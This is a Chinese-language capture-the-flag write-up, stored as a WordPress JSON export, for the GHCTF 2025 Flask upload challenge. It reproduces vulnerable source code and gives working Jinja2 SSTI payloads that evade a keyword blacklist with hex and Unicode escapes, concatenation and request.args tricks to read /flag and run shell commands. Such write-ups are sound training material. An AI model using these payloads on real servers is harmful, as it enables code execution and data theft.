{"id":3053,"date":"2026-03-06T23:53:15","date_gmt":"2026-03-06T15:53:15","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=3053"},"modified":"2026-03-06T23:53:19","modified_gmt":"2026-03-06T15:53:19","slug":"ghctf-2025-upload-ssti","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2026\/03\/06\/ghctf-2025-upload-ssti\/","title":{"rendered":"GHCTF 2025 upload SSTI!"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260305224754-2.png\" alt=\"Pasted image 20260305224754.png\"><\/p>\n<h1>\u4e00\u3001\u8bbf\u95ee\u9898\u76ee<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306214523-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306214523-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306214523.png\"><\/div><br \/>\n\u4e0b\u8f7d\u6e90\u7801app.py<\/p>\n<h1>\u4e8c\u3001\u4ee3\u7801\u5ba1\u8ba1<\/h1>\n<pre><code class=\"language-python\">import os  \nimport re  \n  \nfrom flask import Flask, request, jsonify,render_template_string,send_from_directory, abort,redirect  \nfrom werkzeug.utils import secure_filename  \nimport os  \nfrom werkzeug.utils import secure_filename  \n  \napp = Flask(__name__)  \n  \n# \u914d\u7f6e\u4fe1\u606f  \nUPLOAD_FOLDER = 'static\/uploads'  # \u4e0a\u4f20\u6587\u4ef6\u4fdd\u5b58\u76ee\u5f55  \nALLOWED_EXTENSIONS = {'txt', 'log', 'text','md','jpg','png','gif'}  \nMAX_CONTENT_LENGTH = 16 * 1024 * 1024  # \u9650\u5236\u4e0a\u4f20\u5927\u5c0f\u4e3a 16MB  \napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER  \napp.config['MAX_CONTENT_LENGTH'] = MAX_CONTENT_LENGTH  \n  \n# \u521b\u5efa\u4e0a\u4f20\u76ee\u5f55\uff08\u5982\u679c\u4e0d\u5b58\u5728\uff09  \nos.makedirs(UPLOAD_FOLDER, exist_ok=True)  \ndef is_safe_path(basedir, path):  \n    return os.path.commonpath([basedir,path])  \n  \n  \ndef contains_dangerous_keywords(file_path):  \n    dangerous_keywords = ['_', 'os', 'subclasses', '__builtins__', '__globals__','flag',]  \n  \n    with open(file_path, 'rb') as f:  \n        file_content = str(f.read())  \n  \n  \n        for keyword in dangerous_keywords:  \n            if keyword in file_content:  \n                return True  # \u627e\u5230\u5371\u9669\u5173\u952e\u5b57\uff0c\u8fd4\u56de True  \n    return False  # \u6587\u4ef6\u5185\u5bb9\u4e2d\u6ca1\u6709\u5371\u9669\u5173\u952e\u5b57  \ndef allowed_file(filename):  \n    return '.' in filename and \\  \n        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS  \n  \n  \n@app.route('\/', methods=['GET', 'POST'])  \ndef upload_file():  \n    if request.method == 'POST':  \n        # \u68c0\u67e5\u662f\u5426\u6709\u6587\u4ef6\u88ab\u4e0a\u4f20  \n        if 'file' not in request.files:  \n            return jsonify({&quot;error&quot;: &quot;\u672a\u4e0a\u4f20\u6587\u4ef6&quot;}), 400  \n  \n        file = request.files['file']  \n  \n        # \u68c0\u67e5\u662f\u5426\u9009\u62e9\u4e86\u6587\u4ef6  \n        if file.filename == '':  \n            return jsonify({&quot;error&quot;: &quot;\u8bf7\u9009\u62e9\u6587\u4ef6&quot;}), 400  \n  \n        # \u9a8c\u8bc1\u6587\u4ef6\u540d\u548c\u6269\u5c55\u540d  \n        if file and allowed_file(file.filename):  \n            # \u5b89\u5168\u5904\u7406\u6587\u4ef6\u540d  \n            filename = secure_filename(file.filename)  \n            # \u4fdd\u5b58\u6587\u4ef6  \n            save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)  \n            file.save(save_path)  \n  \n  \n  \n            # \u8fd4\u56de\u6587\u4ef6\u8def\u5f84\uff08\u7edd\u5bf9\u8def\u5f84\uff09  \n            return jsonify({  \n                &quot;message&quot;: &quot;File uploaded successfully&quot;,  \n                &quot;path&quot;: os.path.abspath(save_path)  \n            }), 200  \n        else:  \n            return jsonify({&quot;error&quot;: &quot;\u6587\u4ef6\u7c7b\u578b\u9519\u8bef&quot;}), 400  \n  \n    # GET \u8bf7\u6c42\u663e\u793a\u4e0a\u4f20\u8868\u5355\uff08\u53ef\u9009\uff09  \n    return '''  \n    &lt;!doctype html&gt;    &lt;title&gt;Upload File&lt;\/title&gt;    &lt;h1&gt;Upload File&lt;\/h1&gt;    &lt;form method=post enctype=multipart\/form-data&gt;      &lt;input type=file name=file&gt;      &lt;input type=submit value=Upload&gt;    &lt;\/form&gt;    '''  \n@app.route('\/file\/&lt;path:filename&gt;')  \ndef view_file(filename):  \n    try:  \n        # 1. \u8fc7\u6ee4\u6587\u4ef6\u540d  \n        safe_filename = secure_filename(filename)  \n        if not safe_filename:  \n            abort(400, description=&quot;\u65e0\u6548\u6587\u4ef6\u540d&quot;)  \n  \n        # 2. \u6784\u9020\u5b8c\u6574\u8def\u5f84  \n        file_path = os.path.join(app.config['UPLOAD_FOLDER'], safe_filename)  \n  \n        # 3. \u8def\u5f84\u5b89\u5168\u68c0\u67e5  \n        if not is_safe_path(app.config['UPLOAD_FOLDER'], file_path):  \n            abort(403, description=&quot;\u7981\u6b62\u8bbf\u95ee\u7684\u8def\u5f84&quot;)  \n  \n        # 4. \u68c0\u67e5\u6587\u4ef6\u662f\u5426\u5b58\u5728  \n        if not os.path.isfile(file_path):  \n            abort(404, description=&quot;\u6587\u4ef6\u4e0d\u5b58\u5728&quot;)  \n  \n        suffix=os.path.splitext(filename)[1]  \n        print(suffix)  \n        if suffix==&quot;.jpg&quot; or suffix==&quot;.png&quot; or suffix==&quot;.gif&quot;:  \n            return send_from_directory(&quot;static\/uploads\/&quot;,filename,mimetype='image\/jpeg')  \n  \n        if contains_dangerous_keywords(file_path):  \n            # \u5220\u9664\u4e0d\u5b89\u5168\u7684\u6587\u4ef6  \n            os.remove(file_path)  \n            return jsonify({&quot;error&quot;: &quot;Waf!!!!&quot;}), 400  \n  \n        with open(file_path, 'rb') as f:  \n            file_data = f.read().decode('utf-8')  \n        tmp_str = &quot;&quot;&quot;&lt;!DOCTYPE html&gt;  \n        &lt;html lang=&quot;zh&quot;&gt;        &lt;head&gt;            &lt;meta charset=&quot;UTF-8&quot;&gt;            &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;            &lt;title&gt;\u67e5\u770b\u6587\u4ef6\u5185\u5bb9&lt;\/title&gt;  \n        &lt;\/head&gt;        &lt;body&gt;            &lt;h1&gt;\u6587\u4ef6\u5185\u5bb9\uff1a{name}&lt;\/h1&gt;  &lt;!-- \u663e\u793a\u6587\u4ef6\u540d --&gt;            &lt;pre&gt;{data}&lt;\/pre&gt;  &lt;!-- \u663e\u793a\u6587\u4ef6\u5185\u5bb9 --&gt;  \n            &lt;footer&gt;                &lt;p&gt;&amp;copy; 2025 \u6587\u4ef6\u67e5\u770b\u5668&lt;\/p&gt;  \n            &lt;\/footer&gt;        &lt;\/body&gt;        &lt;\/html&gt;        &quot;&quot;&quot;.format(name=safe_filename, data=file_data)  \n  \n        return render_template_string(tmp_str)  \n  \n    except Exception as e:  \n        app.logger.error(f&quot;\u6587\u4ef6\u67e5\u770b\u5931\u8d25: {str(e)}&quot;)  \n        abort(500, description=&quot;\u6587\u4ef6\u67e5\u770b\u5931\u8d25:{} &quot;.format(str(e)))  \n  \n  \n# \u9519\u8bef\u5904\u7406\uff08\u53ef\u9009\uff09  \n@app.errorhandler(404)  \ndef not_found(error):  \n    return {&quot;error&quot;: error.description}, 404  \n  \n  \n@app.errorhandler(403)  \ndef forbidden(error):  \n    return {&quot;error&quot;: error.description}, 403  \n  \n  \nif __name__ == '__main__':  \n    app.run(&quot;0.0.0.0&quot;,debug=False)\n<\/code><\/pre>\n<ul>\n<li>\u5206\u6790\u4ee3\u7801\uff0c\u53d1\u73b0\u6709ssti\u6ce8\u5165\u7684\u53ef\u80fd<\/li>\n<\/ul>\n<pre><code class=\"language-python\">tmp_str = &quot;&quot;&quot;&lt;!DOCTYPE html&gt;  \n        &lt;html lang=&quot;zh&quot;&gt;        &lt;head&gt;            &lt;meta charset=&quot;UTF-8&quot;&gt;            &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;            &lt;title&gt;\u67e5\u770b\u6587\u4ef6\u5185\u5bb9&lt;\/title&gt;  \n        &lt;\/head&gt;        &lt;body&gt;            &lt;h1&gt;\u6587\u4ef6\u5185\u5bb9\uff1a{name}&lt;\/h1&gt;  &lt;!-- \u663e\u793a\u6587\u4ef6\u540d --&gt;            &lt;pre&gt;{data}&lt;\/pre&gt;  &lt;!-- \u663e\u793a\u6587\u4ef6\u5185\u5bb9 --&gt;  \n            &lt;footer&gt;                &lt;p&gt;&amp;copy; 2025 \u6587\u4ef6\u67e5\u770b\u5668&lt;\/p&gt;  \n            &lt;\/footer&gt;        &lt;\/body&gt;        &lt;\/html&gt;        &quot;&quot;&quot;.format(name=safe_filename, data=file_data)  \n  \n        return render_template_string(tmp_str)\n<\/code><\/pre>\n<p><code>render_template<\/code> \u662f\u00a0Flask \u6846\u67b6\u4e2d\u7684\u4e00\u4e2a\u51fd\u6570\uff0c\u7528\u4e8e\u6e32\u67d3 HTML \u6a21\u677f\u3002\u5b83\u63a5\u53d7\u6a21\u677f\u6587\u4ef6\u540d\u4f5c\u4e3a\u7b2c\u4e00\u4e2a\u53c2\u6570\uff0c\u5e76\u53ef\u4ee5\u4f20\u9012\u4e00\u7ec4\u53d8\u91cf\u4f5c\u4e3a\u7b2c\u4e8c\u4e2a\u53c2\u6570\u3002<code>render_template_string()<\/code>\u7684\u4f5c\u7528\u548c\u524d\u8005\u7c7b\u4f3c\uff0c\u4f46\u5b83\u76f4\u63a5\u63a5\u53d7\u5b57\u7b26\u4e32\u800c\u4e0d\u662f\u6a21\u677f\u6587\u4ef6\uff0c\u5e76\u4f7f\u7528 Jinja2 \u6e32\u67d3\u3002\u5728html\u6a21\u677f\u4e2dname\u548cdata\u4f1a\u88ab\u5f53\u505a\u6a21\u677f\u8fdb\u884c\u6e32\u67d3\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u901a\u8fc7\u6ce8\u5165\u6076\u610f\u4ee3\u7801\u4f7f\u5f97\u6076\u610f\u4ee3\u7801\u88ab\u6e32\u67d3\u4ece\u800c\u9020\u6210ssti\u3002<\/p>\n<ul>\n<li>\u83b7\u53d6\u6587\u4ef6\u4e0a\u4f20\u540e\u7684\u8def\u5f84<\/li>\n<\/ul>\n<pre><code class=\"language-python\">@app.route('\/file\/&lt;path:filename&gt;')\n\n with open(file_path, 'rb') as f:\n            file_data = f.read().decode('utf-8')\n<\/code><\/pre>\n<p>\u4e0a\u4f20\u6210\u529f\u540e\u8bbf\u95ee\/file\/\u6587\u4ef6\u540d\uff0c\u5e76\u4e14\u4ee5\u4e8c\u8fdb\u5236\u6587\u4ef6\u7684\u683c\u5f0f\u6253\u5f00\u6587\u4ef6\u5e76\u4f7f\u7528utf-8\u7684\u89e3\u7801\u5f62\u5f0f\u8fdb\u884c\u8bfb\u53d6\uff0c\u5982\u679c\u76ee\u6807\u662f\u56fe\u50cf\u6216\u8005\u5176\u5b83\u4e0d\u80fd\u4f7f\u7528utf-8\u89e3\u7801\u5f62\u5f0f\u7684\u6587\u4ef6\uff0c\u89e3\u6790\u4f1a\u62a5\u9519,\u56e0\u6b64\u9700\u8981\u4e0a\u4f20\u6587\u672c\u7c7b\u578b\u7684\u6587\u4ef6\u3002<\/p>\n<ul>\n<li>waf<\/li>\n<\/ul>\n<pre><code class=\"language-python\">def contains_dangerous_keywords(file_path):  \ndangerous_keywords = ['_', 'os', 'subclasses', '__builtins__', '__globals__','flag',]  \n  \nif contains_dangerous_keywords(file_path):  \n    # \u5220\u9664\u4e0d\u5b89\u5168\u7684\u6587\u4ef6  \n    os.remove(file_path)  \n    return jsonify({&quot;error&quot;: &quot;Waf!!!!&quot;}), 400\n<\/code><\/pre>\n<p>\u4ee3\u7801\u89c4\u5b9a\u4e86\u9ed1\u540d\u5355\uff0c\u6587\u4ef6\u7684\u5185\u5bb9\u4e2d\u5982\u679c\u5305\u542b\u9ed1\u540d\u5355\u4e2d\u7684\u5b57\u7b26\u5c31\u4f1a\u5220\u9664\u8be5\u6587\u4ef6\u5e76\u62a5\u9519<\/p>\n<h1>\u4e09\u3001waf\u7ed5\u8fc7<\/h1>\n<h2>1.\u4f20\u5165<code>{{7*7}}<\/code><\/h2>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306221120-2.png\" alt=\"Pasted image 20260306221120.png\"><\/p>\n<p>\u6210\u529f\u89e3\u6790\u4e3a49\uff0c\u5b58\u5728\u6f0f\u6d1e<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306221110-2.png\" alt=\"Pasted image 20260306221110.png\"><\/p>\n<h2>2.waf\u7ed5\u8fc7<\/h2>\n<h3>\u65b9\u6cd5\u4e00<\/h3>\n<ul>\n<li>\n<p>\u4f7f\u7528\u5341\u516d\u8fdb\u5236\u7ed5\u8fc7\u654f\u611f\u5b57\u7b26\uff08\u5982flag\u4e2d\u7684\u5b57\u6bcdg\u3001\u4e0b\u5212\u7ebf\uff09<\/p>\n<\/li>\n<li>\n<p>\u65b9\u62ec\u53f7\u00a0<code>[]<\/code>\u66ff\u6362<code>.<\/code>\uff1aPython\u5141\u8bb8\u901a\u8fc7<code>obj[&quot;key&quot;]<\/code>\u7684\u65b9\u5f0f\u8bbf\u95ee\u5c5e\u6027\u6216\u5b57\u5178\u7684\u952e\uff0c\u8fd9\u79cd\u65b9\u5f0f\u7684\u5c5e\u6027\u540d\u88ab\u5305\u88f9\u5728\u5b57\u7b26\u4e32\u4e2d\uff0c\u53ef\u4ee5\u52a8\u6001\u6784\u9020\uff08\u6bd4\u5982\u62fc\u63a5\u6216\u7f16\u7801\uff09\uff0c\u4ece\u800c\u7ed5\u8fc7WAF\u5bf9\u56fa\u5b9a\u6a21\u5f0f\u7684\u8fc7\u6ee4<\/p>\n<\/li>\n<li>\n<p>\u4f7f\u7528Unicode \u7f16\u7801\u7ed5\u8fc7\u654f\u611f\u5b57\u7b26<\/p>\n<\/li>\n<li>\n<p>\u8fc7\u6ee4\u5173\u952e\u5b57\u4f7f\u7528+\u62fc\u63a5\u7ed5\u8fc7<\/p>\n<\/li>\n<li>\n<p>lipsum\u6784\u9020payload<br \/>\n\u8f93\u5165<code>{{lipsum}}<\/code>\u6210\u529f\u89e3\u6790\uff0c\u8bf4\u660e\u8be5\u51fd\u6570\u5b58\u5728<br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306223601-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306223601-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306223601.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306223139-2.png\" alt=\"Pasted image 20260306223139.png\"><\/p>\n<\/li>\n<\/ul>\n<p>\u5341\u516d\u8fdb\u5236<code>\\x5f<\/code>\u66ff\u6362<code>_<\/code>,\u4e2d\u62ec\u53f7\u66ff\u6362<code>.<\/code>\uff0c\u4f7f\u7528<code>__globals__<\/code>\u51fd\u6570\u67e5\u770b\u5168\u5c40\u53d8\u91cf<\/p>\n<pre><code>{{lipsum[&quot;\\x5f\\x5fglobals\\x5f\\x5f&quot;]}}\n<\/code><\/pre>\n<p>\u8f93\u5165\uff0c\u6210\u529f\u89e3\u6790\uff0c\u83b7\u53d6\u5168\u5c40\u53d8\u91cf<br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306223544-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306223544-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306223544.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306223534-2.png\" alt=\"Pasted image 20260306223534.png\"><\/p>\n<p>\u8c03\u7528<code>__builtins__<\/code> \u6a21\u5757\u4ece\u5168\u5c40\u53d8\u91cf\u4e2d\u62ff\u5230 Python \u5185\u7f6e\u51fd\u6570\u5b57\u5178,\u8c03\u7528 open \u51fd\u6570\u8bfb\u53d6 \/flag\u6587\u4ef6\u5185\u5bb9\uff0c\u5341\u516d\u8fdb\u5236<code>\\x67<\/code>\u66ff\u6362g<\/p>\n<pre><code>{{lipsum[&quot;\\x5f\\x5fglobals\\x5f\\x5f&quot;][&quot;\\x5f\\x5fbuiltins\\x5f\\x5f&quot;][&quot;open&quot;](&quot;\/fla\\x67&quot;).read()}}\n<\/code><\/pre>\n<p>\u6e90payload<\/p>\n<pre><code>{{lipsum.__globals__.__builtins__.open('\/flag').read()}}\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306224223-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306224223-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306224223.png\"><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306224232-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306224232-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306224232.png\"><\/div><br \/>\n\u6210\u529f\u83b7\u53d6payload<\/p>\n<ul>\n<li><code>''<\/code>\u6784\u9020payload<br \/>\n\u67e5\u770b\u5f53\u524d\u5bf9\u8c61\u6240\u5c5e\u7c7b<\/li>\n<\/ul>\n<pre><code>{{''[&quot;\\x5f\\x5fclass\\x5f\\x5f&quot;]}}\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306225928-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306225928-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306225928.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306225938-2.png\" alt=\"Pasted image 20260306225938.png\"><\/p>\n<p>\u6784\u9020payload\uff1aUnicode \u7f16\u7801\uff0c\u8fc7\u6ee4\u5173\u952e\u5b57\u4f7f\u7528+\u62fc\u63a5\u7ed5\u8fc7<\/p>\n<pre><code>{{''[&quot;\\x5f\\x5fclass\\x5f\\x5f&quot;][&quot;\\x5f\\x5fbase\\x5f\\x5f&quot;][&quot;\\x5f\\x5fsub&quot;+&quot;classes\\x5f\\x5f&quot;]()[137][&quot;\\x5f\\x5finit\\x5f\\x5f&quot;][&quot;\\x5f\\x5fglobals\\x5f\\x5f&quot;][&quot;\\x5f\\x5fbuiltins\\x5f\\x5f&quot;]['open']('\/\\u0066\\u006c\\u0061\\u0067').read()}}\n<\/code><\/pre>\n<p>\u6e90payload<\/p>\n<pre><code>{{''.__class__.__base__.__subclasses__()[137].__init__.__globals__.__builtins__.open('\/flag').read()}}\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306230724-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306230724-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306230724.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306230733-2.png\" alt=\"Pasted image 20260306230733.png\"><\/p>\n<h3>\u65b9\u6cd5\u4e8c<\/h3>\n<p>request\u7ed5\u8fc7\uff1a\u9884\u8bbe\u67e5\u8be2\u53c2\u6570+\u4eceurl\u4e2d\u4f20\u9012\u503c\u62fc\u63a5\u7684\u65b9\u6cd5\u6765\u7ed5\u8fc7\u76f4\u63a5\u5bf9\u6a21\u677f\u53c2\u6570\u7684\u8fc7\u6ee4<\/p>\n<p>request\u7ed5\u8fc7\u8be6\u89e3\uff1a<br \/>\nrequest.args.xx \u662f Python \u7684\u00a0Flask \u6846\u67b6\u4e2d\u7528\u4e8e\u8bbf\u95ee URL \u67e5\u8be2\u53c2\u6570\u7684\u4e00\u79cd\u65b9\u5f0f\u3002\u5177\u4f53\u6765\u8bf4\uff1a<br \/>\nrequest\u00a0\u662f Flask \u4e2d\u7684\u4e00\u4e2a\u5168\u5c40\u5bf9\u8c61\uff0c\u4ee3\u8868\u5f53\u524d\u7684 HTTP \u8bf7\u6c42\u3002<br \/>\nrequest.args \u662f\u4e00\u4e2a\u5b57\u5178-like \u7684\u5bf9\u8c61\uff08\u5b9e\u9645\u4e0a\u662f MultiDict\uff09\uff0c\u5b83\u5305\u542b\u4e86 URL \u4e2d\u67e5\u8be2\u5b57\u7b26\u4e32\uff08\u5373 ? \u540e\u9762\u7684\u90e8\u5206\uff09\u4e2d\u7684\u6240\u6709\u53c2\u6570\u3002<br \/>\nxx \u662f\u67e5\u8be2\u53c2\u6570\u7684\u540d\u79f0\uff0c\u901a\u8fc7\u00a0request.args.xx\u00a0\u53ef\u4ee5\u83b7\u53d6\u5bf9\u5e94\u53c2\u6570\u7684\u503c\u3002<br \/>\n\u4f8b\u5982\uff0c\u5982\u679c URL \u662f <code>http:\/\/example.com\/path?param1=value1$param1=value2<\/code>\uff0c\u90a3\u4e48\uff1a<br \/>\n<code>request.args['param1']<\/code> \u8fd4\u56de &#8216;value1&#8217;\u3002<br \/>\n<code>request.args['param2']<\/code> \u8fd4\u56de &#8216;value2&#8217;\u3002<br \/>\n\u5728 Jinja2 \u6a21\u677f\u4e2d\uff0c\u53ef\u4ee5\u76f4\u63a5\u5199 request.args.param1 \u6765\u83b7\u53d6 &#8216;value1&#8217;\u3002<br \/>\n\u7b80\u5355\u6765\u8bf4\uff0crequest.args.xx \u5c31\u662f\u4ece\u00a0URL \u67e5\u8be2\u53c2\u6570\u4e2d\u63d0\u53d6\u540d\u4e3a xx \u7684\u503c\u7684\u4e00\u79cd\u65b9\u6cd5<\/p>\n<p>\u6784\u9020payload\uff1a<\/p>\n<pre><code>{{''[request.args.x1][request.args.x2][0][request.args.x3]()[137][request.args.x4][request.args.x5]['popen']('cat \/f*').read()}}\n<\/code><\/pre>\n<p>url\uff1a<\/p>\n<pre><code>?x1=__class__&amp;x2=__bases__&amp;x3=__subclasses__&amp;x4=__init__&amp;&amp;x5=__globals__\n<\/code><\/pre>\n<p>\u5c06?\u53ca\u540e\u9762\u5b57\u7b26\u62fc\u63a5\u5230\u6240\u4e0a\u4f20\u6587\u4ef6\u7684url\u540e\u5373\u53ef\uff1a<br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306231629-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306231629-2.png\" 